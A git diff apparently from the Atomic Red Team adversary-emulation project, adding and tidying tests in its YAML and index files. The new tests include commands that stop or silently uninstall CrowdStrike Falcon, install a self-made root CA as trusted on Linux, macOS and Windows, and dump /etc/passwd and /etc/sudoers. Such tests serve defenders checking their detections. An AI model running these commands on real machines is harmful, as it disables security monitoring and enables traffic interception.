Sysmon Filter Driver -defense-evasion,T1089,Disabling Security Tools,9,Disable Windows IIS HTTP Logging -defense-evasion,T1089,Disabling Security Tools,10,Uninstall Sysmon -defense-evasion,T1089,Disabling Security Tools,11,AMSI Bypass - AMSI InitFailed -defense-evasion,T1089,Disabling Security Tools,12,AMSI Bypass - Remove AMSI Provider Reg Key -defense-evasion,T1089,Disabling Security Tools,13,Disable Arbitrary Security Windows Service -defense-evasion,T1089,Disabling Security Tools,14,Tamper with Windows Defender ATP PowerShell -defense-evasion,T1089,Disabling Security Tools,15,Tamper with Windows Defender Command Prompt -defense-evasion,T1089,Disabling Security Tools,16,Tamper with Windows Defender Registry -defense-evasion,T1089,Disabling Security Tools,17,Disable Microft Office Security Features -defense-evasion,T1089,Disabling Security Tools,18,Remove Windows Defender Definition Files -defense-evasion,T1089,Disabling Security Tools,19,Stop and Remove Arbitrary Security Windows Service +defense-evasion,T1089,Disabling Security Tools,10,Unload Sysmon Filter Driver +defense-evasion,T1089,Disabling Security Tools,11,Disable Windows IIS HTTP Logging +defense-evasion,T1089,Disabling Security Tools,12,Uninstall Sysmon +defense-evasion,T1089,Disabling Security Tools,13,AMSI Bypass - AMSI InitFailed +defense-evasion,T1089,Disabling Security Tools,14,AMSI Bypass - Remove AMSI Provider Reg Key +defense-evasion,T1089,Disabling Security Tools,15,Disable Arbitrary Security Windows Service +defense-evasion,T1089,Disabling Security Tools,16,Tamper with Windows Defender ATP PowerShell +defense-evasion,T1089,Disabling Security Tools,17,Tamper with Windows Defender Command Prompt +defense-evasion,T1089,Disabling Security Tools,18,Tamper with Windows Defender Registry +defense-evasion,T1089,Disabling Security Tools,19,Disable Microft Office Security Features +defense-evasion,T1089,Disabling Security Tools,20,Remove Windows Defender Definition Files +defense-evasion,T1089,Disabling Security Tools,21,Stop and Remove Arbitrary Security Windows Service +defense-evasion,T1089,Disabling Security Tools,22,Uninstall Crowdstrike Falcon on Windows defense-evasion,T1107,File Deletion,4,Delete a single file - Windows cmd defense-evasion,T1107,File Deletion,5,Delete an entire folder - Windows cmd defense-evasion,T1107,File Deletion,6,Delete a single file - Windows PowerShell @@ -57,6 +58,7 @@ defense-evasion,T1070,Indicator Removal on Host,6,Delete System Logs Using Power defense-evasion,T1070,Indicator Removal on Host,7,Delete System Logs Using Clear-EventLogId defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution - forfiles.exe +defense-evasion,T1130,Install Root Certificate,4,Install root CA on Windows defense-evasion,T1118,InstallUtil,1,CheckIfInstallable method call defense-evasion,T1118,InstallUtil,2,InstallHelper method call defense-evasion,T1118,InstallUtil,3,InstallUtil class constructor method call @@ -266,7 +268,7 @@ discovery,T1518,Software Discovery,2,Applications Installed discovery,T1082,System Information Discovery,1,System Information Discovery discovery,T1082,System Information Discovery,6,Hostname Discovery (Windows) discovery,T1082,System Information Discovery,8,Windows MachineGUID Discovery -discovery,T1016,System Network Configuration Discovery,1,System Network Configuration Discovery +discovery,T1016,System Network Configuration Discovery,1,System Network Configuration Discovery on Windows discovery,T1016,System Network Configuration Discovery,2,List Windows Firewall Rules discovery,T1016,System Network Configuration Discovery,4,System Network Configuration Discovery (TrickBot Style) discovery,T1016,System Network Configuration Discovery,5,List Open Egress Ports diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index af2c8d00..c54906b6 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -206,21 +206,24 @@ - Atomic Test #2: Disable syslog [linux] - Atomic Test #3: Disable Cb Response [linux] - Atomic Test #4: Disable SELinux [linux] - - Atomic Test #5: Disable Carbon Black Response [macos] - - Atomic Test #6: Disable LittleSnitch [macos] - - Atomic Test #7: Disable OpenDNS Umbrella [macos] - - Atomic Test #8: Unload Sysmon Filter Driver [windows] - - Atomic Test #9: Disable Windows IIS HTTP Logging [windows] - - Atomic Test #10: Uninstall Sysmon [windows] - - Atomic Test #11: AMSI Bypass - AMSI InitFailed [windows] - - Atomic Test #12: AMSI Bypass - Remove AMSI Provider Reg Key [windows] - - Atomic Test #13: Disable Arbitrary Security Windows Service [windows] - - Atomic Test #14: Tamper with Windows Defender ATP PowerShell [windows] - - Atomic Test #15: Tamper with Windows Defender Command Prompt [windows] - - Atomic Test #16: Tamper with Windows Defender Registry [windows] - - Atomic Test #17: Disable Microft Office Security Features [windows] - - Atomic Test #18: Remove Windows Defender Definition Files [windows] - - Atomic Test #19: Stop and Remove Arbitrary Security Windows Service [windows] + - Atomic Test #5: Stop Crowdstrike Falcon on Linux [linux] + - Atomic Test #6: Disable Carbon Black Response [macos] + - Atomic Test #7: Disable LittleSnitch [macos] + - Atomic Test #8: Disable OpenDNS Umbrella [macos] + - Atomic Test #9: Stop and unload Crowdstrike Falcon on macOS [macos] + - Atomic Test #10: Unload Sysmon Filter Driver [windows] + - Atomic Test #11: Disable Windows IIS HTTP Logging [windows] + - Atomic Test #12: Uninstall Sysmon [windows] + - Atomic Test #13: AMSI Bypass - AMSI InitFailed [windows] + - Atomic Test #14: AMSI Bypass - Remove AMSI Provider Reg Key [windows] + - Atomic Test #15: Disable Arbitrary Security Windows Service [windows] + - Atomic Test #16: Tamper with Windows Defender ATP PowerShell [windows] + - Atomic Test #17: Tamper with Windows Defender Command Prompt [windows] + - Atomic Test #18: Tamper with Windows Defender Registry [windows] + - Atomic Test #19: Disable Microft Office Security Features [windows] + - Atomic Test #20: Remove Windows Defender Definition Files [windows] + - Atomic Test #21: Stop and Remove Arbitrary Security Windows Service [windows] + - Atomic Test #22: Uninstall Crowdstrike Falcon on Windows [windows] - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -287,6 +290,9 @@ - Atomic Test #2: Indirect Command Execution - forfiles.exe [windows] - [T1130 Install Root Certificate](../../T1130/T1130.md) - Atomic Test #1: Install root CA on CentOS/RHEL [linux] + - Atomic Test #2: Install root CA on Debian/Ubuntu [linux] + - Atomic Test #3: Install root CA on macOS [macos] + - Atomic Test #4: Install root CA on Windows [windows] - [T1118 InstallUtil](../../T1118/T1118.md) - Atomic Test #1: CheckIfInstallable method call [windows] - Atomic Test #2: InstallHelper method call [windows] @@ -612,7 +618,7 @@ - Atomic Test #2: Applications Installed [windows] - [T1082 System Information Discovery](../../T1082/T1082.md) - Atomic Test #1: System Information Discovery [windows] - - Atomic Test #2: System Information Discovery [linux, macos] + - Atomic Test #2: System Information Discovery [macos] - Atomic Test #3: List OS Information [linux, macos] - Atomic Test #4: Linux VM Check via Hardware [linux] - Atomic Test #5: Linux VM Check via Kernel Modules [linux] @@ -620,7 +626,7 @@ - Atomic Test #7: Hostname Discovery [linux, macos] - Atomic Test #8: Windows MachineGUID Discovery [windows] - [T1016 System Network Configuration Discovery](../../T1016/T1016.md) - - Atomic Test #1: System Network Configuration Discovery [windows] + - Atomic Test #1: System Network Configuration Discovery on Windows [windows] - Atomic Test #2: List Windows Firewall Rules [windows] - Atomic Test #3: System Network Configuration Discovery [macos, linux] - Atomic Test #4: System Network Configuration Discovery (TrickBot Style) [windows] diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index f25248cb..e4988db8 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md @@ -98,7 +98,6 @@ - Atomic Test #7: Remote System Discovery - sweep [linux, macos] - [T1518 Software Discovery](../../T1518/T1518.md) - [T1082 System Information Discovery](../../T1082/T1082.md) - - Atomic Test #2: System Information Discovery [linux, macos] - Atomic Test #3: List OS Information [linux, macos] - Atomic Test #4: Linux VM Check via Hardware [linux] - Atomic Test #5: Linux VM Check via Kernel Modules [linux] @@ -151,6 +150,7 @@ - Atomic Test #2: Disable syslog [linux] - Atomic Test #3: Disable Cb Response [linux] - Atomic Test #4: Disable SELinux [linux] + - Atomic Test #5: Stop Crowdstrike Falcon on Linux [linux] - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1107 File Deletion](../../T1107/T1107.md) @@ -180,6 +180,7 @@ - Atomic Test #5: Overwrite Linux Log [linux] - [T1130 Install Root Certificate](../../T1130/T1130.md) - Atomic Test #1: Install root CA on CentOS/RHEL [linux] + - Atomic Test #2: Install root CA on Debian/Ubuntu [linux] - [T1036 Masquerading](../../T1036/T1036.md) - Atomic Test #2: Masquerading as Linux crond process. [linux] - [T1027 Obfuscated Files or Information](../../T1027/T1027.md) diff --git a/atomics/Indexes/Indexes-Markdown/macos-index.md b/atomics/Indexes/Indexes-Markdown/macos-index.md index c223b80e..c015b6ec 100644 --- a/atomics/Indexes/Indexes-Markdown/macos-index.md +++ b/atomics/Indexes/Indexes-Markdown/macos-index.md @@ -111,7 +111,7 @@ - Atomic Test #3: Security Software Discovery - ps [linux, macos] - [T1518 Software Discovery](../../T1518/T1518.md) - [T1082 System Information Discovery](../../T1082/T1082.md) - - Atomic Test #2: System Information Discovery [linux, macos] + - Atomic Test #2: System Information Discovery [macos] - Atomic Test #3: List OS Information [linux, macos] - Atomic Test #7: Hostname Discovery [linux, macos] - [T1016 System Network Configuration Discovery](../../T1016/T1016.md) @@ -240,9 +240,10 @@ - [T1090 Connection Proxy](../../T1090/T1090.md) - Atomic Test #1: Connection Proxy [macos, linux] - [T1089 Disabling Security Tools](../../T1089/T1089.md) - - Atomic Test #5: Disable Carbon Black Response [macos] - - Atomic Test #6: Disable LittleSnitch [macos] - - Atomic Test #7: Disable OpenDNS Umbrella [macos] + - Atomic Test #6: Disable Carbon Black Response [macos] + - Atomic Test #7: Disable LittleSnitch [macos] + - Atomic Test #8: Disable OpenDNS Umbrella [macos] + - Atomic Test #9: Stop and unload Crowdstrike Falcon on macOS [macos] - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1107 File Deletion](../../T1107/T1107.md) @@ -276,6 +277,7 @@ - [T1070 Indicator Removal on Host](../../T1070/T1070.md) - Atomic Test #3: rm -rf [macos, linux] - [T1130 Install Root Certificate](../../T1130/T1130.md) + - Atomic Test #3: Install root CA on macOS [macos] - T1149 LC_MAIN Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1152 Launchctl](../../T1152/T1152.md) - Atomic Test #1: Launchctl [macos] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 1983d0ad..45f41ede 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -41,18 +41,19 @@ - Atomic Test #1: Deobfuscate/Decode Files Or Information [windows] - Atomic Test #2: Certutil Rename and Decode [windows] - [T1089 Disabling Security Tools](../../T1089/T1089.md) - - Atomic Test #8: Unload Sysmon Filter Driver [windows] - - Atomic Test #9: Disable Windows IIS HTTP Logging [windows] - - Atomic Test #10: Uninstall Sysmon [windows] - - Atomic Test #11: AMSI Bypass - AMSI InitFailed [windows] - - Atomic Test #12: AMSI Bypass - Remove AMSI Provider Reg Key [windows] - - Atomic Test #13: Disable Arbitrary Security Windows Service [windows] - - Atomic Test #14: Tamper with Windows Defender ATP PowerShell [windows] - - Atomic Test #15: Tamper with Windows Defender Command Prompt [windows] - - Atomic Test #16: Tamper with Windows Defender Registry [windows] - - Atomic Test #17: Disable Microft Office Security Features [windows] - - Atomic Test #18: Remove Windows Defender Definition Files [windows] - - Atomic Test #19: Stop and Remove Arbitrary Security Windows Service [windows] + - Atomic Test #10: Unload Sysmon Filter Driver [windows] + - Atomic Test #11: Disable Windows IIS HTTP Logging [windows] + - Atomic Test #12: Uninstall Sysmon [windows] + - Atomic Test #13: AMSI Bypass - AMSI InitFailed [windows] + - Atomic Test #14: AMSI Bypass - Remove AMSI Provider Reg Key [windows] + - Atomic Test #15: Disable Arbitrary Security Windows Service [windows] + - Atomic Test #16: Tamper with Windows Defender ATP PowerShell [windows] + - Atomic Test #17: Tamper with Windows Defender Command Prompt [windows] + - Atomic Test #18: Tamper with Windows Defender Registry [windows] + - Atomic Test #19: Disable Microft Office Security Features [windows] + - Atomic Test #20: Remove Windows Defender Definition Files [windows] + - Atomic Test #21: Stop and Remove Arbitrary Security Windows Service [windows] + - Atomic Test #22: Uninstall Crowdstrike Falcon on Windows [windows] - T1480 Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -90,6 +91,7 @@ - Atomic Test #1: Indirect Command Execution - pcalua.exe [windows] - Atomic Test #2: Indirect Command Execution - forfiles.exe [windows] - [T1130 Install Root Certificate](../../T1130/T1130.md) + - Atomic Test #4: Install root CA on Windows [windows] - [T1118 InstallUtil](../../T1118/T1118.md) - Atomic Test #1: CheckIfInstallable method call [windows] - Atomic Test #2: InstallHelper method call [windows] @@ -436,7 +438,7 @@ - Atomic Test #6: Hostname Discovery (Windows) [windows] - Atomic Test #8: Windows MachineGUID Discovery [windows] - [T1016 System Network Configuration Discovery](../../T1016/T1016.md) - - Atomic Test #1: System Network Configuration Discovery [windows] + - Atomic Test #1: System Network Configuration Discovery on Windows [windows] - Atomic Test #2: List Windows Firewall Rules [windows] - Atomic Test #4: System Network Configuration Discovery (TrickBot Style) [windows] - Atomic Test #5: List Open Egress Ports [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 591668e0..a98c0dc4 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -7399,6 +7399,21 @@ defense-evasion: command: 'setenforce 0 ' + - name: Stop Crowdstrike Falcon on Linux + description: 'Stop and disable Crowdstrike Falcon on Linux + +' + supported_platforms: + - linux + executor: + name: sh + elevation_required: true + command: | + sudo systemctl stop falcon-sensor.service + sudo systemctl disable falcon-sensor.service + cleanup_command: | + sudo systemctl enable falcon-sensor.service + sudo systemctl start falcon-sensor.service - name: Disable Carbon Black Response description: 'Disables Carbon Black Response @@ -7432,6 +7447,28 @@ defense-evasion: command: 'sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist ' + - name: Stop and unload Crowdstrike Falcon on macOS + description: 'Stop and unload Crowdstrike Falcon daemons falcond and userdaemon + on macOS + +' + supported_platforms: + - macos + input_arguments: + falcond_plist: + description: The path of the Crowdstrike Falcon plist file + type: path + default: "/Library/LaunchDaemons/com.crowdstrike.falcond.plist" + userdaemon_plist: + description: The path of the Crowdstrike Userdaemon plist file + type: path + default: "/Library/LaunchDaemons/com.crowdstrike.userdaemon.plist" + executor: + name: sh + elevation_required: true + command: | + sudo launchctl unload #{falcond_plist} + sudo launchctl unload #{userdaemon_plist} - name: Unload Sysmon Filter Driver description: | Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. To verify successful execution, o verify successful execution, @@ -7700,9 +7737,31 @@ defense-evasion: executor: name: powershell elevation_required: true - command: |- + command: | Stop-Service -Name #{service_name} Remove-Service -Name #{service_name} + - name: Uninstall Crowdstrike Falcon on Windows + description: 'Uninstall Crowdstrike Falcon. If the WindowsSensor.exe path is + not provided as an argument we need to search for it. Since the executable + is located in a folder named with a random guid we need to identify it before + invoking the uninstaller. + +' + supported_platforms: + - windows + input_arguments: + falcond_path: + description: The Crowdstrike Windows Sensor path. The Guid always changes. + type: path + default: C:\ProgramData\Package Cache\{7489ba93-b668-447f-8401-7e57a6fe538d}\WindowsSensor.exe + executor: + name: powershell + elevation_required: true + command: if (Test-Path "#{falcond_path}") {. "#{falcond_path}" /repair /uninstall + /quiet } else { Get-ChildItem -Path "C:\ProgramData\Package Cache" -Include + "WindowsSensor.exe" -Recurse | % { $sig=$(Get-AuthenticodeSignature -FilePath + $_.FullName); if ($sig.Status -eq "Valid" -and $sig.SignerCertificate.DnsNameList + -eq "CrowdStrike, Inc.") { . "$_" /repair /uninstall /quiet; break;}}} T1107: technique: x_mitre_data_sources: @@ -9416,7 +9475,7 @@ defense-evasion: name: sh command: | openssl genrsa -out #{key_filename} 4096 - openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -out #{cert_filename} + openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -le "5" ]; then @@ -9425,6 +9484,93 @@ defense-evasion: cp rootCA.crt /etc/pki/ca-trust/source/anchors/ update-ca-trust fi + - name: Install root CA on Debian/Ubuntu + description: 'Creates a root CA with openssl + +' + supported_platforms: + - linux + input_arguments: + key_filename: + description: Key we create that is used to create the CA certificate + type: Path + default: rootCA.key + cert_filename: + description: CA file name + type: Path + default: rootCA.crt + dependency_executor_name: command_prompt + dependencies: + - description: Verify the certificate exists. It generates if not on disk. + prereq_command: 'if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi;' + get_prereq_command: |- + if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi; + openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} + executor: + name: sh + elevation_required: true + command: | + mv #{cert_filename} /usr/local/share/ca-certificates + echo sudo update-ca-certificates + - name: Install root CA on macOS + description: 'Creates a root CA with openssl + +' + supported_platforms: + - macos + input_arguments: + key_filename: + description: Key we create that is used to create the CA certificate + type: Path + default: rootCA.key + cert_filename: + description: CA file name + type: Path + default: rootCA.crt + dependency_executor_name: command_prompt + dependencies: + - description: Verify the certificate exists. It generates if not on disk. + prereq_command: 'if [ -f #{cert_filename} ]; then exit 0; else exit 1; fi;' + get_prereq_command: |- + if [ ! -f #{key_filename} ]; then openssl genrsa -out #{key_filename} 4096; fi; + openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -subj "/C=US/ST=Denial/L=Springfield/O=Dis/CN=www.example.com" -out #{cert_filename} + executor: + name: command_prompt + elevation_required: true + command: 'sudo security add-trusted-cert -d -r trustRoot -k "/Library/Keychains/System.keychain" + "#{cert_filename}" + +' + - name: Install root CA on Windows + description: 'Creates a root CA with Powershell + +' + supported_platforms: + - windows + input_arguments: + pfx_path: + description: Path of the certificate + type: Path + default: rootCA.cer + dependency_executor_name: powershell + dependencies: + - description: Verify the certificate exists. It generates if not on disk. + prereq_command: 'if (Test-Path #{cert_filename}) { exit 0 } else { exit 1 + }' + get_prereq_command: |- + $cert = New-SelfSignedCertificate -DnsName atomicredteam.com -CertStoreLocation cert:\LocalMachine\My + Export-Certificate -Type CERT -Cert Cert:\LocalMachine\My\$cert.Thumbprint -FilePath #{pfx_path} + Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) | Remove-Item + executor: + name: command_prompt + elevation_required: true + command: | + $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My + Move-Item -Path $cert.PSPath -Destination "Cert:\LocalMachine\Root" + cleanup_command: | + $cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My + Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) | Remove-Item + Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) | Remove-Item T1118: technique: x_mitre_data_sources: @@ -17493,10 +17639,13 @@ discovery: output_file: description: Path where captured results will be placed type: Path - default: "~/loot.txt" + default: "/tmp/T1087.txt" executor: name: sh - command: 'cat /etc/passwd > #{output_file} + command: | + cat /etc/passwd > #{output_file} + cat #{output_file} + cleanup_command: 'rm -f #{output_file} ' - name: View sudoers access @@ -17508,10 +17657,14 @@ discovery: output_file: description: Path where captured results will be placed type: Path - default: "~/loot.txt" + default: "/tmp/T1087.txt" executor: name: sh - command: 'cat /etc/sudoers > #{output_file} + elevation_required: true + command: | + cat /etc/sudoers > #{output_file} + cat #{output_file} + cleanup_command: 'rm -f #{output_file} ' - name: View accounts with UID 0 @@ -17525,10 +17678,13 @@ discovery: output_file: description: Path where captured results will be placed type: Path - default: "~/loot.txt" + default: "/tmp/T1087.txt" executor: name: sh - command: 'grep ''x:0:'' /etc/passwd > #{output_file} + command: | + grep 'x:0:' /etc/passwd > #{output_file} + cat #{output_file} 2>/dev/null + cleanup_command: 'rm -f #{output_file} 2>/dev/null ' - name: List opened files by user @@ -17553,10 +17709,20 @@ discovery: output_file: description: Path where captured results will be placed type: Path - default: "~/loot.txt" + default: "/tmp/T1087.txt" + dependency_executor_name: sh + dependencies: + - description: Check if lastlog command exists on the machine + prereq_command: if [ -x "$(command -v lastlog)" ]; then exit 0; else exit + 1; + get_prereq_command: echo "Install lastlog on the machine to run the test."; + exit 1; executor: name: sh - command: 'lastlog > #{output_file} + command: | + lastlog > #{output_file} + cat #{output_file} + cleanup_command: 'rm -f #{output_file} ' - name: Enumerate users and groups @@ -17768,10 +17934,17 @@ discovery: ' supported_platforms: - linux + input_arguments: + output_file: + description: Path where captured results will be placed. + type: Path + default: "/tmp/T1217-Firefox.txt" executor: name: sh - command: 'find / -path "*.mozilla/firefox/*/places.sqlite" -exec echo {} >> - /tmp/firefox-bookmarks.txt \; + command: | + find / -path "*.mozilla/firefox/*/places.sqlite" 2>/dev/null -exec echo {} >> #{output_file} \; + cat #{output_file} 2>/dev/null + cleanup_command: 'rm -f #{output_file} 2>/dev/null ' - name: List Mozilla Firefox Bookmark Database Files on macOS @@ -17781,10 +17954,17 @@ discovery: ' supported_platforms: - macos + input_arguments: + output_file: + description: Path where captured results will be placed. + type: Path + default: "/tmp/T1217_Firefox.txt" executor: name: sh - command: 'find / -path "*/Firefox/Profiles/*/places.sqlite" -exec echo {} - >> /tmp/firefox-bookmarks.txt \; + command: | + find / -path "*/Firefox/Profiles/*/places.sqlite" -exec echo {} >> #{output_file} \; + cat #{output_file} 2>/dev/null + cleanup_command: 'rm -f #{output_file} 2>/dev/null ' - name: List Google Chrome Bookmark JSON Files on macOS @@ -17794,10 +17974,17 @@ discovery: ' supported_platforms: - macos + input_arguments: + output_file: + description: Path where captured results will be placed. + type: Path + default: "/tmp/T1217-Chrome.txt" executor: name: sh - command: 'find / -path "*/Google/Chrome/*/Bookmarks" -exec echo {} >> /tmp/chrome-bookmarks.txt - \; + command: | + find / -path "*/Google/Chrome/*/Bookmarks" -exec echo {} >> #{output_file} \; + cat #{output_file} 2>/dev/null + cleanup_command: 'rm -f #{output_file} 2>/dev/null ' - name: List Google Chrome Bookmarks on Windows with powershell @@ -18150,16 +18337,25 @@ discovery: supported_platforms: - macos - linux + input_arguments: + output_file: + description: Output file used to store the results. + type: path + default: "/tmp/T1083.txt" executor: name: sh command: | - ls -a > allcontents.txt - ls -la /Library/Preferences/ > detailedprefsinfo.txt - file */* *>> ../files.txt + ls -a >> #{output_file} + if [ -d /Library/Preferences/ ]; then ls -la /Library/Preferences/ > #{output_file}; fi; + file */* *>> #{output_file} + cat #{output_file} 2>/dev/null find . -type f ls -R | grep ":$" | sed -e 's/:$//' -e 's/[^-][^\/]*\//--/g' -e 's/^/ /' -e 's/-/|/' locate * which sh + cleanup_command: 'rm #{output_file} + +' - name: Nix File and Directory Discovery 2 description: 'Find or discover files on the file system @@ -18167,13 +18363,20 @@ discovery: supported_platforms: - macos - linux + input_arguments: + output_file: + description: Output file used to store the results. + type: path + default: "/tmp/T1083.txt" executor: name: sh command: | - cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > /tmp/loot.txt - cat /etc/mtab > /tmp/loot.txt - find . -type f -iname *.pdf > /tmp/loot.txt + cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > #{output_file} + if [ -f /etc/mtab ]; then cat /etc/mtab >> #{output_file}; fi; + find . -type f -iname *.pdf >> #{output_file} + cat #{output_file}; fi; find . -type f -name ".*" + cleanup_command: 'rm #{output_file}' T1046: technique: x_mitre_permissions_required: @@ -18265,6 +18468,12 @@ discovery: description: Host to scan. type: string default: 192.168.1.1 + dependency_executor_name: sh + dependencies: + - description: Check if nmap command exists on the machine + prereq_command: if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; + get_prereq_command: echo "Install nmap on the machine to run the test."; exit + 1; executor: name: sh command: | @@ -18772,9 +18981,9 @@ discovery: executor: name: sh command: | - dscacheutil -q group - dscl . -list /Groups - groups + if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi; fi; + if [ -x "$(command -v dscl)" ]; then dscl . -list /Groups; else echo "dscl is missing from the machine. skipping..."; fi; + if [ -x "$(command -v groups)" ]; then groups; else echo "groups is missing from the machine. skipping..."; fi; - name: Basic Permission Groups Discovery Windows description: | Basic Permission Groups Discovery for Windows. This test will display some errors if run on a computer not connected to a domain. Upon execution, domain @@ -19134,6 +19343,11 @@ discovery: supported_platforms: - linux - macos + dependency_executor_name: sh + dependencies: + - description: Check if arp command exists on the machine + prereq_command: if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; + get_prereq_command: echo "Install arp on the machine."; exit 1; executor: name: sh elevation_required: false @@ -19147,11 +19361,24 @@ discovery: supported_platforms: - linux - macos + input_arguments: + subnet: + description: Subnet used for ping sweep. + type: string + default: 192.168.1 + start_host: + description: Subnet used for ping sweep. + type: string + default: 1 + stop_host: + description: Subnet used for ping sweep. + type: string + default: 254 executor: name: sh elevation_required: false - command: 'for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip; [ $? -eq 0 ] - && echo "192.168.1.$ip UP" || : ; done + command: 'for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; + [ $? -eq 0 ] && echo "#{subnet}.$ip UP" || : ; done ' - name: Remote System Discovery - nslookup @@ -19452,12 +19679,10 @@ discovery: ' supported_platforms: - - linux - macos executor: name: sh command: | - systemsetup system_profiler ls -al /Applications - name: List OS Information @@ -19467,14 +19692,21 @@ discovery: supported_platforms: - linux - macos + input_arguments: + output_file: + description: Output file used to store the results. + type: path + default: "/tmp/T1082.txt" executor: name: sh - command: | - uname -a >> /tmp/loot.txt - cat /etc/lsb-release >> /tmp/loot.txt - cat /etc/redhat-release >> /tmp/loot.txt - uptime >> /tmp/loot.txt - cat /etc/issue >> /tmp/loot.txt + command: "uname -a >> #{output_file}\nif [ -f /etc/lsb-release ]; then cat + /etc/lsb-release >> #{output_file}; fi;\nif [ -f /etc/redhat-release ]; + then cat /etc/redhat-release >> #{output_file}; fi; \nif [ -f /etc/issue + ]; then cat /etc/issue >> #{output_file}; fi;\nuptime >> #{output_file}\ncat + #{output_file} 2>/dev/null\n" + cleanup_command: 'rm #{output_file} 2>/dev/null + +' - name: Linux VM Check via Hardware description: 'Identify virtual machine hardware. This technique is used by the Pupy RAT and other malware. @@ -19485,14 +19717,14 @@ discovery: executor: name: bash command: | - cat /sys/class/dmi/id/bios_version | grep -i amazon - cat /sys/class/dmi/id/product_name | grep -i "Droplet\|HVM\|VirtualBox\|VMware" - cat /sys/class/dmi/id/chassis_vendor | grep -i "Xen\|Bochs\|QEMU" - sudo dmidecode | grep -i "microsoft\|vmware\|virtualbox\|quemu\|domu" - cat /proc/scsi/scsi | grep -i "vmware\|vbox" - cat /proc/ide/hd0/model | grep -i "vmware\|vbox\|qemu\|virtual" - sudo lspci | grep -i "vmware\|virtualbox" - sudo lscpu | grep -i "Xen\|KVM\|Microsoft" + if [ -f /sys/class/dmi/id/bios_version ]; then cat /sys/class/dmi/id/bios_version | grep -i amazon; fi; + if [ -f /sys/class/dmi/id/product_name ]; then cat /sys/class/dmi/id/product_name | grep -i "Droplet\|HVM\|VirtualBox\|VMware"; fi; + if [ -f /sys/class/dmi/id/product_name ]; then cat /sys/class/dmi/id/chassis_vendor | grep -i "Xen\|Bochs\|QEMU"; fi; + if [ -x "$(command -v dmidecode)" ]; then sudo dmidecode | grep -i "microsoft\|vmware\|virtualbox\|quemu\|domu"; fi; + if [ -f /proc/scsi/scsi ]; then cat /proc/scsi/scsi | grep -i "vmware\|vbox"; fi; + if [ -f /proc/ide/hd0/model ]; then cat /proc/ide/hd0/model | grep -i "vmware\|vbox\|qemu\|virtual"; fi; + if [ -x "$(command -v lspci)" ]; then sudo lspci | grep -i "vmware\|virtualbox" + if [ -x "$(command -v lscpu)" ]; then sudo lscpu | grep -i "Xen\|KVM\|Microsoft" - name: Linux VM Check via Kernel Modules description: 'Identify virtual machine guest kernel modules. This technique is used by the Pupy RAT and other malware. @@ -19588,7 +19820,7 @@ discovery: modified: '2019-08-12T19:44:26.156Z' identifier: T1016 atomic_tests: - - name: System Network Configuration Discovery + - name: System Network Configuration Discovery on Windows description: | Identify network configuration information @@ -19629,9 +19861,10 @@ discovery: name: sh elevation_required: false command: | - arp -a - netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c - ifconfig + if [ -x "$(command -v arp)" ]; then arp -a; else echo "arp is missing from the machine. skipping..."; fi; + if [ -x "$(command -v ifconfig)" ]; then ifconfig; else echo "ifconfig is missing from the machine. skipping..."; fi; + if [ -x "$(command -v ip)" ]; then ip addr; else echo "ip is 